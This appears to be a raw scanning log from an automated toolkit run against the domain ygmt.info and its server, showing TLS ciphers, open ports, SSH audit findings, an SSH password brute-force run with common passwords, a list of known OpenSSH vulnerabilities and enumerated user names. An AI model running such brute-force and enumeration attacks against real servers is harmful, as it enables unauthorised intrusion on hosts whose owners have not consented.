Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA256 DHE 2048 bits
Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-GCM-SHA384 Curve P-256 DHE 256
Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA384 Curve P-256 DHE 256
Accepted TLSv1.2 128 bits DHE-RSA-AES128-GCM-SHA256 DHE 2048 bits
Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA256 DHE 2048 bits
Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-GCM-SHA256 Curve P-256 DHE 256
Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA256 Curve P-256 DHE 256
Accepted TLSv1.2 256 bits DHE-RSA-CAMELLIA256-SHA DHE 2048 bits
Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
Accepted TLSv1.2 128 bits DHE-RSA-CAMELLIA128-SHA DHE 2048 bits
Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
Accepted TLSv1.2 256 bits CAMELLIA256-SHA
Accepted TLSv1.2 256 bits AES256-SHA
Accepted TLSv1.2 128 bits CAMELLIA128-SHA
Accepted TLSv1.2 128 bits AES128-SHA
Preferred TLSv1.1 256 bits DHE-RSA-CAMELLIA256-SHA DHE 2048 bits
Accepted TLSv1.1 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
Accepted TLSv1.1 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
Accepted TLSv1.1 128 bits DHE-RSA-CAMELLIA128-SHA DHE 2048 bits
Accepted TLSv1.1 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
Accepted TLSv1.1 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
Accepted TLSv1.1 256 bits CAMELLIA256-SHA
Accepted TLSv1.1 256 bits AES256-SHA
Accepted TLSv1.1 128 bits CAMELLIA128-SHA
Accepted TLSv1.1 128 bits AES128-SHA
Preferred TLSv1.0 256 bits DHE-RSA-CAMELLIA256-SHA DHE 2048 bits
Accepted TLSv1.0 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
Accepted TLSv1.0 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
Accepted TLSv1.0 128 bits DHE-RSA-CAMELLIA128-SHA DHE 2048 bits
Accepted TLSv1.0 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
Accepted TLSv1.0 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
Accepted TLSv1.0 256 bits CAMELLIA256-SHA
Accepted TLSv1.0 256 bits AES256-SHA
Accepted TLSv1.0 128 bits CAMELLIA128-SHA
Accepted TLSv1.0 128 bits AES128-SHA

 SSL Certificate:
Signature Algorithm: sha256WithRSAEncryption
RSA Key Strength: 2048

Subject: ygmt.info
Altnames: DNS:ygmt.info, DNS:www.ygmt.info
Issuer: COMODO RSA Domain Validation Secure Server CA

Not valid before: Feb 14 00:00:00 2017 GMT
Not valid after: Feb 14 23:59:59 2018 GMT
######################################################################################################################################
Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-06 00:16 EDT
Nmap scan report for www.ygmt.info (185.82.200.52)
Host is up (0.12s latency).
rDNS record for 185.82.200.52: latina.petite.guru
Not shown: 479 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
443/tcp open https
10000/tcp open snet-sensor-mgmt

Nmap done: 1 IP address (1 host up) scanned in 2.01 seconds
######################################################################################################################################
# general
(gen) banner: SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u8
(gen) software: OpenSSH 6.7p1
(gen) compatibility: OpenSSH 6.5-6.9, Dropbear SSH 2013.62+
(gen) compression: enabled (zlib@openssh.com)

# key exchange algorithms
(kex) curve25519-sha256@libssh.org -- [info] available since OpenSSH 6.5, Dropbear SSH 2013.62
(kex) ecdh-sha2-nistp256 -- [fail] using weak elliptic curves
 `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
(kex) ecdh-sha2-nistp384 -- [fail] using weak elliptic curves
 `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
(kex) ecdh-sha2-nistp521 -- [fail] using weak elliptic curves
 `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
(kex) diffie-hellman-group-exchange-sha256 -- [warn] using custom size modulus (possibly weak)
 `- [info] available since OpenSSH 4.4
(kex) diffie-hellman-group14-sha1 -- [warn] using weak hashing algorithm
 `- [info] available since OpenSSH 3.9, Dropbear SSH 0.53

# host-key algorithms
(key) ssh-rsa -- [info] available since OpenSSH 2.5.0, Dropbear SSH 0.28
(key) ssh-dss -- [fail] removed (in server) and disabled (in client) since OpenSSH 7.0, weak algorithm
 `- [warn] using small 1024-bit modulus
 `- [warn] using weak random number generator could reveal the key
 `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
(key) ecdsa-sha2-nistp256 -- [fail] using weak elliptic curves
 `- [warn] using weak random number generator could reveal the key
 `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
(key) ssh-ed25519 -- [info] available since OpenSSH 6.5

# encryption algorithms (ciphers)
(enc) aes128-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
(enc) aes192-ctr -- [info] available since OpenSSH 3.7
(enc) aes256-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
(enc) aes128-gcm@openssh.com -- [info] available since OpenSSH 6.2
(enc) aes256-gcm@openssh.com -- [info] available since OpenSSH 6.2
(enc) chacha20-poly1305@openssh.com -- [info] available since OpenSSH 6.5
 `- [info] default cipher since OpenSSH 6.9.

# message authentication code algorithms
(mac) umac-64-etm@openssh.com -- [warn] using small 64-bit tag size
 `- [info] available since OpenSSH 6.2
(mac) umac-128-etm@openssh.com -- [info] available since OpenSSH 6.2
(mac) hmac-sha2-256-etm@openssh.com -- [info] available since OpenSSH 6.2
(mac) hmac-sha2-512-etm@openssh.com -- [info] available since OpenSSH 6.2
(mac) hmac-sha1-etm@openssh.com -- [warn] using weak hashing algorithm
 `- [info] available since OpenSSH 6.2
(mac) umac-64@openssh.com -- [warn] using encrypt-and-MAC mode
 `- [warn] using small 64-bit tag size
 `- [info] available since OpenSSH 4.7
(mac) umac-128@openssh.com -- [warn] using encrypt-and-MAC mode
 `- [info] available since OpenSSH 6.2
(mac) hmac-sha2-256 -- [warn] using encrypt-and-MAC mode
 `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
(mac) hmac-sha2-512 -- [warn] using encrypt-and-MAC mode
 `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
(mac) hmac-sha1 -- [warn] using encrypt-and-MAC mode
 `- [warn] using weak hashing algorithm
 `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28

# algorithm recommendations (for OpenSSH 6.7)
(rec) -ecdh-sha2-nistp521 -- kex algorithm to remove
(rec) -ecdh-sha2-nistp384 -- kex algorithm to remove
(rec) -ecdh-sha2-nistp256 -- kex algorithm to remove
(rec) -diffie-hellman-group14-sha1 -- kex algorithm to remove
(rec) -ecdsa-sha2-nistp256 -- key algorithm to remove
(rec) -ssh-dss -- key algorithm to remove
(rec) -hmac-sha2-512 -- mac algorithm to remove
(rec) -umac-128@openssh.com -- mac algorithm to remove
(rec) -hmac-sha2-256 -- mac algorithm to remove
(rec) -umac-64@openssh.com -- mac algorithm to remove
(rec) -hmac-sha1 -- mac algorithm to remove
(rec) -hmac-sha1-etm@openssh.com -- mac algorithm to remove
(rec) -umac-64-etm@openssh.com -- mac algorithm to remove
######################################################################################################################################
Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-06 00:17 EDT
NSE: [ssh-run] Failed to specify credentials and command to run.
9056NSE: [ssh-brute] Trying username/password pair: web:soccer
9057NSE: [ssh-brute] Trying username/password pair: test:soccer
9058NSE: [ssh-brute] Trying username/password pair: root:anthony
9059NSE: [ssh-brute] Trying username/password pair: admin:anthony
9060NSE: [ssh-brute] Trying username/password pair: administrator:anthony
9061NSE: [ssh-brute] Trying username/password pair: webadmin:anthony
9062NSE: [ssh-brute] Trying username/password pair: sysadmin:anthony
9063NSE: [ssh-brute] Trying username/password pair: netadmin:anthony
9064NSE: [ssh-brute] Trying username/password pair: guest:anthony
9065NSE: [ssh-brute] Trying username/password pair: user:anthony
9066NSE: [ssh-brute] Trying username/password pair: web:anthony
9067NSE: [ssh-brute] Trying username/password pair: test:anthony
9068NSE: [ssh-brute] Trying username/password pair: root:friends
9069NSE: [ssh-brute] Trying username/password pair: admin:friends
9070NSE: [ssh-brute] Trying username/password pair: administrator:friends
9071NSE: [ssh-brute] Trying username/password pair: webadmin:friends
9072NSE: [ssh-brute] Trying username/password pair: sysadmin:friends
9073NSE: [ssh-brute] Trying username/password pair: netadmin:friends
9074NSE: [ssh-brute] Trying username/password pair: guest:friends
9075NSE: [ssh-brute] Trying username/password pair: user:friends
9076NSE: [ssh-brute] Trying username/password pair: web:friends
9077NSE: [ssh-brute] Trying username/password pair: test:friends
9078NSE: [ssh-brute] Trying username/password pair: root:purple
9079NSE: [ssh-brute] Trying username/password pair: admin:purple
9080NSE: [ssh-brute] Trying username/password pair: administrator:purple
9081NSE: [ssh-brute] Trying username/password pair: webadmin:purple
9082NSE: [ssh-brute] Trying username/password pair: sysadmin:purple
9083NSE: [ssh-brute] Trying username/password pair: netadmin:purple
9084NSE: [ssh-brute] Trying username/password pair: guest:purple
9085NSE: [ssh-brute] Trying username/password pair: user:purple
9086NSE: [ssh-brute] Trying username/password pair: web:purple
9087NSE: [ssh-brute] Trying username/password pair: test:purple
9088NSE: [ssh-brute] Trying username/password pair: root:angel
9089NSE: [ssh-brute] Trying username/password pair: admin:angel
9090NSE: [ssh-brute] Trying username/password pair: administrator:angel
9091NSE: [ssh-brute] Trying username/password pair: webadmin:angel
9092NSE: [ssh-brute] Trying username/password pair: sysadmin:angel
9093NSE: [ssh-brute] Trying username/password pair: netadmin:angel
9094NSE: [ssh-brute] Trying username/password pair: guest:angel
9095NSE: [ssh-brute] Trying username/password pair: user:angel
9096NSE: [ssh-brute] Trying username/password pair: web:angel
9097NSE: [ssh-brute] Trying username/password pair: test:angel
9098NSE: [ssh-brute] Trying username/password pair: root:butterfly
9099NSE: [ssh-brute] Trying username/password pair: admin:butterfly
9100NSE: [ssh-brute] Trying username/password pair: administrator:butterfly
9101NSE: [ssh-brute] Trying username/password pair: webadmin:butterfly
9102NSE: [ssh-brute] Trying username/password pair: sysadmin:butterfly
9103NSE: [ssh-brute] Trying username/password pair: netadmin:butterfly
9104NSE: [ssh-brute] Trying username/password pair: guest:butterfly
9105NSE: [ssh-brute] Trying username/password pair: user:butterfly
9106NSE: [ssh-brute] Trying username/password pair: web:butterfly
9107NSE: [ssh-brute] Trying username/password pair: test:butterfly
9108NSE: [ssh-brute] Trying username/password pair: root:jordan
9109NSE: [ssh-brute] Trying username/password pair: admin:jordan
9110NSE: [ssh-brute] Trying username/password pair: administrator:jordan
9111NSE: [ssh-brute] Trying username/password pair: webadmin:jordan
9112NSE: [ssh-brute] Trying username/password pair: sysadmin:jordan
9113NSE: [ssh-brute] Trying username/password pair: netadmin:jordan
9114NSE: [ssh-brute] Trying username/password pair: guest:jordan
9115NSE: [ssh-brute] Trying username/password pair: user:jordan
9116NSE: [ssh-brute] Trying username/password pair: web:jordan
9117NSE: [ssh-brute] Trying username/password pair: test:jordan
9118NSE: [ssh-brute] Trying username/password pair: root:fuckyou
9119NSE: [ssh-brute] Trying username/password pair: admin:fuckyou
9120NSE: [ssh-brute] Trying username/password pair: administrator:fuckyou
9121NSE: [ssh-brute] Trying username/password pair: webadmin:fuckyou
9122NSE: [ssh-brute] Trying username/password pair: sysadmin:fuckyou
9123NSE: [ssh-brute] Trying username/password pair: netadmin:fuckyou
9124NSE: [ssh-brute] Trying username/password pair: guest:fuckyou
9125NSE: [ssh-brute] Trying username/password pair: user:fuckyou
9126NSE: [ssh-brute] Trying username/password pair: web:fuckyou
9127NSE: [ssh-brute] Trying username/password pair: test:fuckyou
9128NSE: [ssh-brute] Trying username/password pair: root:123123
9129NSE: [ssh-brute] Trying username/password pair: admin:123123
9130NSE: [ssh-brute] Trying username/password pair: administrator:123123
9131NSE: [ssh-brute] Trying username/password pair: webadmin:123123
9132NSE: [ssh-brute] Trying username/password pair: sysadmin:123123
9133NSE: [ssh-brute] Trying username/password pair: netadmin:123123
9134NSE: [ssh-brute] Trying username/password pair: guest:123123
9135NSE: [ssh-brute] Trying username/password pair: user:123123
9136NSE: [ssh-brute] Trying username/password pair: web:123123
9137NSE: [ssh-brute] Trying username/password pair: test:123123
9138NSE: [ssh-brute] Trying username/password pair: root:justin
9139NSE: [ssh-brute] Trying username/password pair: admin:justin
9140NSE: [ssh-brute] Trying username/password pair: administrator:justin
9141NSE: [ssh-brute] Trying username/password pair: webadmin:justin
9142NSE: [ssh-brute] Trying username/password pair: sysadmin:justin
9143NSE: [ssh-brute] Trying username/password pair: netadmin:justin
9144NSE: [ssh-brute] Trying username/password pair: guest:justin
9145NSE: [ssh-brute] Trying username/password pair: user:justin
9146NSE: [ssh-brute] Trying username/password pair: web:justin
9147NSE: [ssh-brute] Trying username/password pair: test:justin
9148NSE: [ssh-brute] Trying username/password pair: root:liverpool
9149NSE: [ssh-brute] Trying username/password pair: admin:liverpool
9150NSE: [ssh-brute] Trying username/password pair: administrator:liverpool
9151NSE: [ssh-brute] Trying username/password pair: webadmin:liverpool
9152NSE: [ssh-brute] Trying username/password pair: sysadmin:liverpool
9153NSE: [ssh-brute] Trying username/password pair: netadmin:liverpool
9154NSE: [ssh-brute] Trying username/password pair: guest:liverpool
9155NSE: [ssh-brute] Trying username/password pair: user:liverpool
9156NSE: [ssh-brute] Trying username/password pair: web:liverpool
9157NSE: [ssh-brute] Trying username/password pair: test:liverpool
9158NSE: [ssh-brute] Trying username/password pair: root:football
9159NSE: [ssh-brute] Trying username/password pair: admin:football
9160NSE: [ssh-brute] Trying username/password pair: administrator:football
9161NSE: [ssh-brute] Trying username/password pair: webadmin:football
9162NSE: [ssh-brute] Trying username/password pair: sysadmin:football
9163NSE: [ssh-brute] Trying username/password pair: netadmin:football
9164NSE: [ssh-brute] Trying username/password pair: guest:football
9165NSE: [ssh-brute] Trying username/password pair: user:football
9166NSE: [ssh-brute] Trying username/password pair: web:football
9167NSE: [ssh-brute] Trying username/password pair: test:football
9168NSE: [ssh-brute] Trying username/password pair: root:loveme
9169NSE: [ssh-brute] Trying username/password pair: admin:loveme
9170NSE: [ssh-brute] Trying username/password pair: administrator:loveme
9171NSE: [ssh-brute] Trying username/password pair: webadmin:loveme
9172NSE: [ssh-brute] Trying username/password pair: sysadmin:loveme
9173NSE: [ssh-brute] Trying username/password pair: netadmin:loveme
9174NSE: [ssh-brute] Trying username/password pair: guest:loveme
9175NSE: [ssh-brute] Trying username/password pair: user:loveme
9176NSE: [ssh-brute] Trying username/password pair: web:loveme
9177NSE: [ssh-brute] Trying username/password pair: test:loveme
9178NSE: [ssh-brute] Trying username/password pair: root:secret
9179NSE: [ssh-brute] Trying username/password pair: admin:secret
9180NSE: [ssh-brute] Trying username/password pair: administrator:secret
9181NSE: [ssh-brute] Trying username/password pair: webadmin:secret
9182NSE: [ssh-brute] Trying username/password pair: sysadmin:secret
9183NSE: [ssh-brute] Trying username/password pair: netadmin:secret
9184NSE: [ssh-brute] Trying username/password pair: guest:secret
9185NSE: [ssh-brute] Trying username/password pair: user:secret
9186NSE: [ssh-brute] Trying username/password pair: web:secret
9187NSE: [ssh-brute] Trying username/password pair: test:secret
9188NSE: [ssh-brute] Trying username/password pair: root:andrea
9189NSE: [ssh-brute] Trying username/password pair: admin:andrea
9190NSE: [ssh-brute] Trying username/password pair: administrator:andrea
9191NSE: [ssh-brute] Trying username/password pair: webadmin:andrea
9192NSE: [ssh-brute] Trying username/password pair: sysadmin:andrea
9193NSE: [ssh-brute] Trying username/password pair: netadmin:andrea
9194NSE: [ssh-brute] Trying username/password pair: guest:andrea
9195NSE: [ssh-brute] Trying username/password pair: user:andrea
9196NSE: [ssh-brute] Trying username/password pair: web:andrea
9197NSE: [ssh-brute] Trying username/password pair: test:andrea
9198NSE: [ssh-brute] Trying username/password pair: root:jennifer
9199NSE: [ssh-brute] Trying username/password pair: admin:jennifer
9200NSE: [ssh-brute] Trying username/password pair: administrator:jennifer
9201NSE: [ssh-brute] Trying username/password pair: webadmin:jennifer
9202NSE: [ssh-brute] Trying username/password pair: sysadmin:jennifer
NSE: [ssh-brute] usernames: Time limit 3m00s exceeded.
NSE: [ssh-brute] usernames: Time limit 3m00s exceeded.
NSE: [ssh-brute] passwords: Time limit 3m00s exceeded.
Nmap scan report for www.ygmt.info (185.82.200.52)
Host is up (0.100s latency).
rDNS record for 185.82.200.52: latina.petite.guru

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u8 (protocol 2.0)
| ssh-auth-methods:
| Supported authentication methods:
| publickey
|_ password
| ssh-brute:
| Accounts: No valid accounts found
|_ Statistics: Performed 445 guesses in 181 seconds, average tps: 2.7
| ssh-hostkey:
| 1024 7f:00:73:df:2a:6e:87:58:3f:76:07:05:5f:92:5b:8c (DSA)
| 2048 40:01:47:ca:ce:05:1c:b8:30:d2:2c:6d:bc:a7:eb:4c (RSA)
| 256 99:cb:fc:6d:e6:51:0d:46:73:06:0e:65:20:8c:c3:d0 (ECDSA)
|_ 256 9e:0b:2d:8f:86:18:26:96:72:48:2d:12:a3:d0:1a:78 (ED25519)
|_ssh-publickey-acceptance: ERROR: Script execution failed (use -d to debug)
|_ssh-run: Failed to specify credentials and command to run.
| vulscan: VulDB - https://vuldb.com:
| [76870] OpenSSH up to 6.9 auth2-chall.c kbdint_next_device privilege escalation
| [76326] OpenSSH 6.8 XSECURITY privilege escalation
| [12724] OpenSSH up to 6.6 Fingerprint Record Check sshconnect.c verify_host_key HostCertificate weak authentication
| [12683] OpenBSD OpenSSH up to 6.5 Configuration child_set_env Wildcard privilege escalation
| [12124] OpenSSH 6.4 J-PAKE Protocol schnorr.c hash_buffer denial of service
| [11124] OpenSSH 6.2/6.3 Post Authentication sshd process initialize mm_newkeys_from_blob privilege escalation
|
| MITRE CVE - https://cve.mitre.org:
| [CVE-2012-5975] The SSH USERAUTH CHANGE REQUEST feature in SSH Tectia Server 6.0.4 through 6.0.20, 6.1.0 through 6.1.12, 6.2.0 through 6.2.5, and 6.3.0 through 6.3.2 on UNIX and Linux, when old-style password authentication is enabled, allows remote attackers to bypass authentication via a crafted session involving entry of blank passwords, as demonstrated by a root login session from a modified OpenSSH client with an added input_userauth_passwd_changereq call in sshconnect2.c.
| [CVE-2012-5536] A certain Red Hat build of the pam_ssh_agent_auth module on Red Hat Enterprise Linux (RHEL) 6 and Fedora Rawhide calls the glibc error function instead of the error function in the OpenSSH codebase, which allows local users to obtain sensitive information from process memory or possibly gain privileges via crafted use of an application that relies on this module, as demonstrated by su and sudo.
| [CVE-2010-5107] The default configuration of OpenSSH through 6.1 enforces a fixed time limit between establishing a TCP connection and completing a login, which makes it easier for remote attackers to cause a denial of service (connection-slot exhaustion) by periodically making many new TCP connections.
| [CVE-2008-1483] OpenSSH 4.3p2, and probably other versions, allows local users to hijack forwarded X connections by causing ssh to set DISPLAY to :10, even when another process is listening on the associated port, as demonstrated by opening TCP port 6010 (IPv4) and sniffing a cookie sent by Emacs.
| [CVE-2007-3102] Unspecified vulnerability in the linux_audit_record_event function in OpenSSH 4.3p2, as used on Fedora Core 6 and possibly other systems, allows remote attackers to write arbitrary characters to an audit log via a crafted username. NOTE: some of these details are obtained from third party information.
| [CVE-2004-2414] Novell NetWare 6.5 SP 1.1, when installing or upgrading using the Overlay CDs and performing a custom installation with OpenSSH, includes sensitive password information in the (1) NIOUTPUT.TXT and (2) NI.LOG log files, which might allow local users to obtain the passwords.
|
| SecurityFocus - https://www.securityfocus.com/bid/:
|
| IBM X-Force - https://exchange.xforce.ibmcloud.com:
|
| Exploit-DB - https://www.exploit-db.com:
| [14866] Novell Netware 6.5 - OpenSSH Remote Stack Overflow
|
| OpenVAS (Nessus) - http://www.openvas.org:
|
| SecurityTracker - https://www.securitytracker.com:
9511| [1007716] OpenSSH buffer_append_space() and Other Buffer Management Errors May Let Remote Users Execute Arbitrary Code
9512| [1006926] OpenSSH Host Access Restrictions Can Be Bypassed By Remote Users
9513| [1006688] OpenSSH Timing Flaw With Pluggable Authentication Modules Can Disclose Valid User Account Names to Remote Users
9514| [1004818] OpenSSH's Secure Shell (SSH) Implementation Weakness May Disclose User Passwords to Remote Users During Man-in-the-Middle Attacks
9515| [1004616] OpenSSH Integer Overflow and Buffer Overflow May Allow Remote Users to Gain Root Access to the System
9516| [1004391] OpenSSH 'BSD_AUTH' Access Control Bug May Allow Unauthorized Remote Users to Authenticated to the System
9517| [1004115] OpenSSH Buffer Overflow in Kerberos Ticket and AFS Token Processing Lets Local Users Execute Arbitrary Code With Root Level Permissions
9518| [1003758] OpenSSH Off-by-one 'Channels' Bug May Let Authorized Remote Users Execute Arbitrary Code with Root Privileges
9519| [1002895] OpenSSH UseLogin Environment Variable Bug Lets Local Users Execute Commands and Gain Root Access
9520| [1002748] OpenSSH 3.0 Denial of Service Condition May Allow Remote Users to Crash the sshd Daemon and KerberosV Configuration Error May Allow Remote Users to Partially Authenticate When Authentication Should Not Be Permitted
9521| [1002734] OpenSSH's S/Key Implementation Information Disclosure Flaw Provides Remote Users With Information About Valid User Accounts
9522| [1002455] OpenSSH May Fail to Properly Restrict IP Addresses in Certain Configurations
9523| [1002432] OpenSSH's Sftp-server Subsystem Lets Authorized Remote Users with Restricted Keypairs Obtain Additional Access on the Server
9524| [1001683] OpenSSH Allows Authorized Users to Delete Other User Files Named Cookies
9525|
9526| OSVDB - http://www.osvdb.org:
9527| [92034] GSI-OpenSSH auth-pam.c Memory Management Authentication Bypass
9528| [90474] Red Hat / Fedora PAM Module for OpenSSH Incorrect error() Function Calling Local Privilege Escalation
9529| [90007] OpenSSH logingracetime / maxstartup Threshold Connection Saturation Remote DoS
9530| [81500] OpenSSH gss-serv.c ssh_gssapi_parse_ename Function Field Length Value Parsing Remote DoS
9531| [78706] OpenSSH auth-options.c sshd auth_parse_options Function authorized_keys Command Option Debug Message Information Disclosure
9532| [75753] OpenSSH PAM Module Aborted Conversation Local Information Disclosure
9533| [75249] OpenSSH sftp-glob.c remote_glob Function Glob Expression Parsing Remote DoS
9534| [75248] OpenSSH sftp.c process_put Function Glob Expression Parsing Remote DoS
9535| [72183] Portable OpenSSH ssh-keysign ssh-rand-helper Utility File Descriptor Leak Local Information Disclosure
9536| [70873] OpenSSH Legacy Certificates Stack Memory Disclosure
9537| [69658] OpenSSH J-PAKE Public Parameter Validation Shared Secret Authentication Bypass
9538| [67743] Novell NetWare OpenSSH SSHD.NLM Absolute Path Handling Remote Overflow
9539| [59353] OpenSSH sshd Local TCP Redirection Connection Masking Weakness
9540| [58495] OpenSSH sshd ChrootDirectory Feature SetUID Hard Link Local Privilege Escalation
9541| [56921] OpenSSH Unspecified Remote Compromise
9542| [53021] OpenSSH on ftp.openbsd.org Trojaned Distribution
9543| [50036] OpenSSH CBC Mode Chosen Ciphertext 32-bit Chunk Plaintext Context Disclosure
9544| [49386] OpenSSH sshd TCP Connection State Remote Account Enumeration
9545| [48791] OpenSSH on Debian sshd Crafted Username Arbitrary Remote SELinux Role Access
9546| [47635] OpenSSH Packages on Red Hat Enterprise Linux Compromised Distribution
9547| [47227] OpenSSH X11UseLocalhost X11 Forwarding Port Hijacking
9548| [45873] Cisco WebNS SSHield w/ OpenSSH Crafted Large Packet Remote DoS
9549| [43911] OpenSSH ~/.ssh/rc ForceCommand Bypass Arbitrary Command Execution
9550| [43745] OpenSSH X11 Forwarding Local Session Hijacking
9551| [43371] OpenSSH Trusted X11 Cookie Connection Policy Bypass
9552| [39214] OpenSSH linux_audit_record_event Crafted Username Audit Log Injection
9553| [37315] pam_usb OpenSSH Authentication Unspecified Issue
9554| [34850] OpenSSH on Mac OS X Key Generation Remote Connection DoS
9555| [34601] OPIE w/ OpenSSH Account Enumeration
9556| [34600] OpenSSH S/KEY Authentication Account Enumeration
9557| [32721] OpenSSH Username Password Complexity Account Enumeration
9558| [30232] OpenSSH Privilege Separation Monitor Weakness
9559| [29494] OpenSSH packet.c Invalid Protocol Sequence Remote DoS
9560| [29266] OpenSSH GSSAPI Authentication Abort Username Enumeration
9561| [29264] OpenSSH Signal Handler Pre-authentication Race Condition Code Execution
9562| [29152] OpenSSH Identical Block Packet DoS
9563| [27745] Apple Mac OS X OpenSSH Nonexistent Account Login Enumeration DoS
9564| [23797] OpenSSH with OpenPAM Connection Saturation Forked Process Saturation DoS
9565| [22692] OpenSSH scp Command Line Filename Processing Command Injection
9566| [20216] OpenSSH with KerberosV Remote Authentication Bypass
9567| [19142] OpenSSH Multiple X11 Channel Forwarding Leaks
9568| [19141] OpenSSH GSSAPIAuthentication Credential Escalation
9569| [18236] OpenSSH no pty Command Execution Local PAM Restriction Bypass
9570| [16567] OpenSSH Privilege Separation LoginGraceTime DoS
9571| [16039] Solaris 108994 Series Patch OpenSSH LDAP Client Authentication DoS
9572| [9562] OpenSSH Default Configuration Anon SSH Service Port Bounce Weakness
9573| [9550] OpenSSH scp Traversal Arbitrary File Overwrite
9574| [6601] OpenSSH *realloc() Unspecified Memory Errors
9575| [6245] OpenSSH SKEY/BSD_AUTH Challenge-Response Remote Overflow
9576| [6073] OpenSSH on FreeBSD libutil Arbitrary File Read
9577| [6072] OpenSSH PAM Conversation Function Stack Modification
9578| [6071] OpenSSH SSHv1 PAM Challenge-Response Authentication Privilege Escalation
9579| [5536] OpenSSH sftp-server Restricted Keypair Restriction Bypass
9580| [5408] OpenSSH echo simulation Information Disclosure
9581| [5113] OpenSSH NIS YP Netgroups Authentication Bypass
9582| [4536] OpenSSH Portable AIX linker Privilege Escalation
9583| [3938] OpenSSL and OpenSSH /dev/random Check Failure
9584| [3456] OpenSSH buffer_append_space() Heap Corruption
9585| [2557] OpenSSH Multiple Buffer Management Multiple Overflows
9586| [2140] OpenSSH w/ PAM Username Validity Timing Attack
9587| [2112] OpenSSH Reverse DNS Lookup Bypass
9588| [2109] OpenSSH sshd Root Login Timing Side-Channel Weakness
9589| [1853] OpenSSH Symbolic Link 'cookies' File Removal
9590| [839] OpenSSH PAMAuthenticationViaKbdInt Challenge-Response Remote Overflow
9591| [781] OpenSSH Kerberos TGT/AFS Token Passing Remote Overflow
9592| [730] OpenSSH Channel Code Off by One Remote Privilege Escalation
9593| [688] OpenSSH UseLogin Environment Variable Local Command Execution
9594| [642] OpenSSH Multiple Key Type ACL Bypass
9595| [504] OpenSSH SSHv2 Public Key Authentication Bypass
9596| [341] OpenSSH UseLogin Local Privilege Escalation
9597|_
9598Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
9599Device type: general purpose|broadband router|WAP|webcam
9600Running (JUST GUESSING): Linux 2.6.X|3.X|2.4.X (95%), Asus embedded (94%), AXIS embedded (94%)
9601OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3 cpe:/h:asus:rt-ac66u cpe:/h:asus:rt-n10 cpe:/h:axis:211_network_camera cpe:/o:linux:linux_kernel:2.6.20 cpe:/o:linux:linux_kernel:2.4 cpe:/o:linux:linux_kernel:3.8
9602Aggressive OS guesses: Linux 2.6.32 - 3.10 (95%), Linux 2.6.32 - 3.9 (95%), Linux 3.0 - 3.1 (94%), Asus RT-AC66U router (Linux 2.6) (94%), Asus RT-N10 router or AXIS 211A Network Camera (Linux 2.6) (94%), Linux 2.6.18 (94%), Asus RT-N16 WAP (Linux 2.6) (94%), Asus RT-N66U WAP (Linux 2.6) (94%), Tomato 1.28 (Linux 2.6.22) (94%), AXIS 211A Network Camera (Linux 2.6.20) (94%)
9603No exact OS matches for host (test conditions non-ideal).
9604Network Distance: 14 hops
9605Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
9606
TRACEROUTE (using port 22/tcp)
HOP RTT ADDRESS
1 47.69 ms 10.246.204.1
2 50.22 ms vlan102.as02.qc1.ca.m247.com (176.113.74.17)
3 33.65 ms irb-0.agg1.qc1.ca.m247.com (37.120.128.168)
4 32.44 ms te-1-5-2-0.bb1.fra2.de.m247.com (82.102.29.44)
5 56.28 ms te0-0-0-3.rcr21.ymq02.atlas.cogentco.com (38.104.155.233)
6 36.99 ms be2089.ccr21.ymq01.atlas.cogentco.com (154.54.45.113)
7 113.10 ms be3043.ccr22.lpl01.atlas.cogentco.com (154.54.44.165)
8 131.24 ms be2182.ccr41.ams03.atlas.cogentco.com (154.54.77.245)
9 131.26 ms be3433.rcr21.ams06.atlas.cogentco.com (154.54.58.202)
10 131.28 ms worldstream.demarc.cogentco.com (149.11.38.226)
11 131.34 ms 109.236.95.185
12 131.31 ms 190.2.158.153
13 131.34 ms 185.106.120.66
14 113.12 ms latina.petite.guru (185.82.200.52)
9623######################################################################################################################################
9624USER_FILE => /usr/share/brutex/wordlists/simple-users.txt
9625RHOSTS => www.ygmt.info
9626RHOST => www.ygmt.info
9627[*] 185.82.200.52:22 - SSH - Using malformed packet technique
9628[*] 185.82.200.52:22 - SSH - Starting scan
9629[+] 185.82.200.52:22 - SSH - User 'admin' found
9630[+] 185.82.200.52:22 - SSH - User 'administrator' found
9631[+] 185.82.200.52:22 - SSH - User 'anonymous' found
9632[-] 185.82.200.52:22 - SSH - User 'backup' not found
9633[+] 185.82.200.52:22 - SSH - User 'bee' found
